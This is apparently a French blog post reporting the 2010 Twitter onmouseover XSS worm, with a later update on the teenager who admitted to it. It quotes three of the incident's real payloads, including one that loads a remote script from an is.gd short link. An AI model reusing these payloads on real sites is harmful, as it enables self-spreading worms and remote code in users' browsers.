Twitter hacké : Faille XSS utilisée
Le site Twitter a été victime d’un détournement dont plusieurs utilisateurs ont pu générer des Rewteets via une faille XSS comme @Matsta, @Matsta, @tbubbaloo et plein d’autres.
Si vous vous rendiez sur votre compte twitter sur le site twitter.com, vous auriez envoyé automatiquement un message (un code) comme ceux-ci :
http://t.co/@ »onmouseover= »document.getElementById(‘status’).value=’RT Matsta’;$(‘.status-update-form’).submit(); »class= »modal-overlay »/
ou celui ci : http://a.no/@ »onmouseover= »;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit() » style= »color:#000;background:#000;/
http://t.co/@ »style= »font-size:999999999999px; »onmouseover= »$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7′) »/
Twitter a donc été victime d’un hack, sans gravité pour les utilsiateurs, juste gênant, à cause d’une faille XSS du système de raccourci d’URL du site (t.co)
Les utilisateurs de client Twitter (Tweetdeck, Hoostsuite…) n’ont pas été concerné par ce bug. Ils ont juste constaté les dégats.
Voici le genre d’erreurs qu’on a pu lire sur le site en se connectant sur sa page twitter :
Un conseil, n’allez plus sur Twitter.com pour poster vos messages ou alors allez y pour vous vous déconnecter (http://twitter.com/logout).
Vous pouvez toujours me suivre (à vos risques et périls :) ) sur Twitter.com/tuxboard.
EDIT 15h20 : la faille a été corrigée.
MAJ 22/09 : Un Australien de 17 ans a admis être l’auteur de cette attaque sur Twitter. Pearce Delphin (@zzap), a reconnu avoir mis au jour une faille dans la sécurité puis avoir entré un code Javascript comme du texte normal dans un message, qui déclenchait l’ouverture de pages web au simple survol de la souris sur le texte.
Mais son idée a été reprise par des hackers qui ont utilisé le code pour rediriger les utilisateurs vers des sites pornographiques ou créer des tweets « vers » qui se répliquaient chaque fois qu’ils étaient lus.
« J’ai fait cela simplement pour voir si le code Javascript pouvait être utilisé dans un tweet (…) Lorsque j’ai posté mon tweet, je n’aurais jamais imaginé que cela allait décoller comme cela. Je n’y avais vraiment pas pensé », a-t-il ajouté.
1 Commentaire
Ce soir c’est au tour de facebook!Enfin c’est peut être pas un hack, juste le site down, apparement ca pourait être une attaque de leur DNS!
Laisser un commentaire
Afin d’assurer la sécurité et la qualité de ce blog, tout commentaire de SPAM, injurieux, diffamant
susceptible ainsi de faire l'objet d'un délit de presse, (Loi du 29 juillet 1881 sur la liberté de la presse) sera modéré.
Il en va de même pour les commentaires de trolls ou haters !



LEGO Le film
Die Antwoord Cookie Thumper
Danny MacAskill's Imaginate
San Francisco et son Golden Gate de nuit
Seul au monde lors des Finales de NHL
Message d'adieu de Virgin Megastore
STREET FIGHTER LONGEST SPECIAL MOVE
Evolutio Application pour jouer avec l'actualité
Elmer Food Beat Nouvel album Les Rois Du Bord De Mer
Les consoles Next Gen en personnages de Game of Thrones
PS4 Photos, vidéo, prix et date de sortie dévoilés
Nouveautés Apple : iOS 7 et iTunes Radio
Les 100 sportifs les mieux payés au monde
Les 10 plus beaux Bars piscines du monde
Sky City plus haut building du monde en Chine
Xbox One, les caractéristiques de la console de jeu de Microsoft